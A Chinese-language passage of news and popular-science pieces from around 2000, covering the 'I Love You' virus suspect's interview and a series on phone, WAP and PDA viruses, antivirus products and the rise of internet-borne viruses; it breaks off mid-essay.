在辩护律师的陪同下,古兹曼说,全世界计算机天才多的是,“但我认为我已是菲律宾历史的一部分,不能被抹煞。”
古兹曼说他已不再非法入侵别人的计算机,但他仍在练习“破译”密码。他说,他使用这种技术从因特网下载软件而不必付费。
古兹曼并不认为用这种方式偷窃软件是“偷”,就像他对计算机病毒所造成的损害从未在良心上受到谴责一样。他说,软件公司,非凡是微软,要为“我爱你”所产生的灾难负责,因为他们在知情的情况下销售易遭攻击的产品。
古兹曼说,“我是消费者,我购买这种产品,只是我的使用方式有问题或不恰当,但这都是我自己的事,为什么要指责我?”
业内人士指出,这种与道德无关的论调是计算机黑客的典型反应,不管他们是住在鳞次栉比的马尼拉住宅区,还是硅谷高级住宅区。
事实上,仅仅在2000年春天以前,古兹曼还是个泛泛之辈,为获得技术学院的计算机学位而苦苦挣扎。5月4日,一封名为“我爱你”的电子邮件忽然出现在亚洲的计算机上,只要一打开,就会销毁图形及其它文档。这个电子邮件程序会通过计算机中的数据库自我复制,迅速传送给地址簿中所有的联络人。不过数小时,欧美地区从新闻工作者、经纪商到政府机关无一幸免。
古兹曼回忆说,当时他在家睡觉,当他醒来听到这一新闻时,一点都没有觉得与自己有关。
马尼拉一下子成了全球追捕病毒作者的重点地区。经过一番追查后,警方证实古兹曼是头号嫌疑犯。一开始,古兹曼说他可能在无意间释放出了病毒;但现在,他说他不知道病毒是怎么跑出去的。
在被当成嫌疑犯后,古兹曼有好几个礼拜躲在他母亲家。几次冒险跑出来,发现大家对他指指点点后,便开始整天窝在家里的沙发上,玩索尼推出的Playstation。
因为发生了这一事件,古兹曼在求职时,一度令计算机公司闻之色变。现在风头已过,古兹曼终于找到了一份工作。他说,微软的Outlook软件是传播病毒的主要工具之一,假如微软提供不错的条件,他愿为微软工作。
计算机病毒小知识速查系列十三
短消息接收也会传播手机病毒
横行互联网的计算机病毒下一个入侵目标是手机和移动上网设备,最终侵入上网电视和其他上网家电。这是亚洲反病毒大会昨天透露的信息。昨天是AVAR的最后一天,会议重点讨论了计算机病毒的未来发展趋势和应对策略。与会者普遍关注手机病毒的发展进程和解决方案,目前,已出现通过短信息发布来传播病毒的手机概念病毒。所谓概念病毒是指已经实现潜伏、传播、感染和破坏等病毒特性的病毒雏形。一旦用户接收到带有病毒的短信息,阅读后便会出现手机键盘被锁死的现象,以后可能出现破坏手机内存储的信息,直至彻底破坏手机IC卡等恶性手机病毒。
应对手机病毒目前主要的技术措施有两种:其一是通过无线网站对手机进行杀毒;其二是通过手机的IC接入口或红外传输口进行杀毒。另据了解,应AVAR协会的邀请,中国专业反病毒公司北京瑞星公司正式成为AVAR协会会员,这是我国拥有完全自有知识产权的反病毒公司第一次加入国际性的反病毒组织。
计算机病毒小知识速查系列十四
专家警告新病毒无WAP不摧
澳大利亚一家互联网安全机构日前警告说,病毒高手很有可能正在编写一种妨碍新一代手机正常工作的病毒,这种病毒将以WAP技术为破坏目标,使手机用户在接受上网服务时产生麻烦。
这一由澳大利亚电脑紧急反应小组发出的警告源自一份在澳大利亚国内流行的恶作剧电子邮件,这份电子邮件谎称目前一种手机病毒正在传播,它可以妨碍用户接入网络,而且可以通过贮存在手机内的电话薄传播给他人的手机。
对此位于澳大利亚昆士兰大学的小组发言人马克-麦克帕森指出:“尽管没有迹象表明大规模的手机病毒将要爆发,但我们认为黑客在新兴的无线手机领域编写新的病毒一点也不令人希奇。”
据悉目前针对掌上电脑的病毒已于今年早些时间被发现,这种病毒在用户利用掌上电脑玩任天堂游戏时被启动,它能够破坏掌上电脑所存贮的数据。9月份,一种名为Phage的掌上电脑病毒也悄然露面,它具有更大的破坏性,可在程序之间传播也可通过用户共享软件中传播给其它的掌上电脑。
计算机病毒小知识速查系列十五
您的PDA需要反病毒软件保护吗?
说起计算机病毒和反病毒之间的斗争,很多朋友都会认为那只有台式计算机和便携式笔记本电脑才会感染计算机病毒。确实如此,传统的计算机病毒主要寄生和感染台式PC机,或者通过INTERNET来传播。很少人听说PDA这样的手持式的无线通讯数字产品也会受到计算机病毒的威胁。
但目前随着PDA和WAP的飞速发展,计算机专家正在进行PDA是否正在受到病毒威胁和是否需要非凡的反病毒软件来保护的问题。专家认为,PDA由于经常需要和台式PC机进行资料同步交换,而PC机上的Word或Excel文档很轻易感染宏病毒。假如是在大公司的局域网里,这种现象更为严重。局域网中只要有一台计算机感染计算机病毒,那么整个网络都将十分的危险。PDA使用的操作系统比如WINDWOSCE是和普通台式PC机基本上有着同样的数据处理能力。而专门为PDA设计的应用软件中亦有能处理EXCEL或WORD文档的功能。这意味着PDA只要和感染病毒的台式PC机进行资料同步,那么PDA很可能就和PC机一样受到病毒的感染,甚至病毒会在PDA中发作。所以有专家形象的把感染病毒的PDA比喻成“一张塞在PC机软驱里的感染病毒的软磁盘”。“一个在公司局域网里流动的炸弹”。由此可见,PDA正在受到病毒的威胁,保护PDA的数据安全已经是一个十分重要的问题。
幸运的是,国际闻名的反病毒软件公司NetworkAssociates已经于8月21日公布推出基于保护PDA的新型防病毒软件。这种新型的防病毒软件被成为McAfeeVirusScanHandheld。根据NetworkAssociates的资料表明,McAfeeVirusScanHandheld主要是用于个人数字助理PDA和其他手持式电脑的安全防护,McAfeeVirusScanHandheld是为了帮助大公司处理和保护日益增长的数字移动用户的数字产品的数据安全而设计的。
McAfeeVirusScanHandheld是一个应用软件,它能安装在用户的台式PC机和与其交换资料的PDA上。McAfeeVirusScanHandheld的反病毒原理基本上和传统的McAfeeVirusScan一样,通过扫描,监视台式PC机和PDA的资料同步来判定电脑是否感染病毒。也可以作为台式PC机向PDA传送资料的病毒过滤器。McAfeeVirusScanHandheld能对付各种已知的规则的文件类型,一般计算机病毒经常感染寄生的文件都能被McAfeeVirusScanHandheld检测。
计算机病毒小知识速查系列十六
新病毒时代
与新经济学家相比,病毒更有理由成为网络时代的宠儿,这是因为:第一,病毒具有更强的表现欲和活动能力;第二,事实证实,病毒能更好地实践互联网速度,从而更加有效地利用整个互联网。
用户:都是网络惹的祸
令人胆战心惊的病毒警报最近再度响起,对象是那些借网络之风日渐流行的掌上电脑。与前一阵沸沸扬扬的手机病毒不同,这一次不再是纸上谈兵,据称,不少用户已经遭碰到了这种被称为Palm.Liberty.A的病毒,趋势科技等公司先后在网上公布了程序代码,让用户及时下载,以查杀这一全新病毒。Palm.Liberty.A病毒的出现,标志着我们迈入一个全新的病毒时代。
一切光荣归于互联网,一切危害也来自于它。网络对于病毒是如此的钟爱,让我们先来看看下面这一组数字:1999年上半年,通过Internet传播的四种病毒造成了76亿美元的巨额损失。这一数字是此前4年所有病毒造成损失的总额。然而这并不算什么,病毒总是喜欢挑战自我,一句“ILOVEYOU”横扫互联网,在短短的数天之内,爱虫自己就创下了65亿美元损失的空前纪录。
病毒是寄生于速度的物种,只有速度才能赋予它巨大的能量,因此,网络理所当然地成为了病毒的最佳伴侣。在CIH病毒之前,笔者很少为媒体上炒得热热闹闹的病毒发愁,因为那时主要的传播介质就是软盘,即使是流行病毒,从国外传进国内一般也需要几个月的时间。而且,只要用户记住在使用软盘时,先进行病毒扫描,就可以在很大的程度上避免病毒的感染。
现在,网络使病毒得到了前所未有的进化,生出翅膀的病毒迫不及待地向人们展示,什么才是互联网的速度。还记得那个“Melissa”吗,这个“小姑娘”在病毒家族中率先完成了自己的“互联网转型”。1999年3月26日,Melissa从制作者的电脑出发,短短的17个小时之内,在300多家企业,至少10万台电脑上留下了自己的足迹。不过,后来出现的爱虫病毒很快使得这一成绩黯然失色。
在运动中破坏,在运动中繁殖。这就是病毒生存的哲理。1999年以前,全球病毒总数约18000种,而2000年还未过完,这一数字已经突破40000种。当时的爱虫病毒,就曾经在一天之内,产生了数十个变种。在您阅读本文的时候,可能又有一群病毒爬上了网络,开始了它们的速度之旅。
当病毒爱上网络,我们又能做些什么呢?
反毒公司:你是风儿,我是沙.....
“你是风儿,我是沙,缠缠绵绵到天边......”。这句歌词是病毒和反毒公司之间关系的最好诠释。病毒恨反病毒公司吗?是的。反病毒公司爱病毒吗?答案同样是肯定的。假如说网络与病毒是最亲密的伴侣,那么病毒与反病毒公司就是一对欢喜冤家。
有了病毒,才有了反毒公司腰袋中鼓鼓的钞票。借助病毒的“恐吓”,反毒软件McAfee的股票首日上市就上涨了三倍,从那些被病毒吓得心惊肉跳的用户手中,共“敲诈”到了20.4亿美金。这次掌上电脑病毒的出现,更是使各大反毒厂商兴奋不已,透过这只病毒,厂商们看到了一个远未开发的巨大金矿,那就是掌上设备与信息家电的安全防护。各厂商争先恐后地推出自己的解决方案,惟恐在这块新兴的市场上落后一步。
病毒肆虐之时,正是反毒厂商大发横财的日子,这听起来让人颇感别扭,难怪有人甚至怀疑,不少病毒就是那些反毒公司制造的。但凭心而论,用户与反病毒软件公司的关系,就像病人与医生的关系,医生不能为了利益希望别人多生病,病人也不能因为付出了金钱就产生怨恨。在网络时代,医生与病人这种关系,更应该由于病毒的猖獗而紧密相连。为了追逐病毒越来越快的脚步,反毒公司也别无选择地爱上了网络。通过互联网,各公司的反病毒中心可以以最快的速度,对全球范围内新出现的病毒做出反映。此外,通过收取会员费的方式,在互联网上提供反毒服务,也成为反毒公司的一条财路。以McAfee为例,它的网站向会员收取49.95美元的年费。不到三个月的时间,登记为会员的用户就达到了12,800名,他们来自世界230个国家。网络造就了全球化的病毒,网络也造就了全球化的反毒公司。
病毒爱上网络,反病毒公司也爱上了它,随着网络的不断发展,这一对冤家的恩爱厮杀就演绎出了全新的病毒时代。
病毒:我的明天更美好
对未来的世界,你会有什么样的想象呢?也许一切已经被媒体描绘得令人向往:在家中,你悠闲地躺在沙发上,观看宽带互动电视。没有什么家务事让你操心,屋里的一切都是可以上网的智能化产品,从冰箱、烤面包机到你脚下穿的球鞋。出门时,乘坐的汽车具有卫星导航系统和多媒体互动装置,在车上,你可以随时浏览新闻,收取Email。至于那些恼人的机械故障,你完全不必担心,车上配备的智能系统会把一切微小的故障在发生前通知修理站,在你毫不查觉的情况下,所有问题都被解决得干干净净。
但在这幅高科技描绘的美好图画中,还缺少了一样东西,那就是病毒。
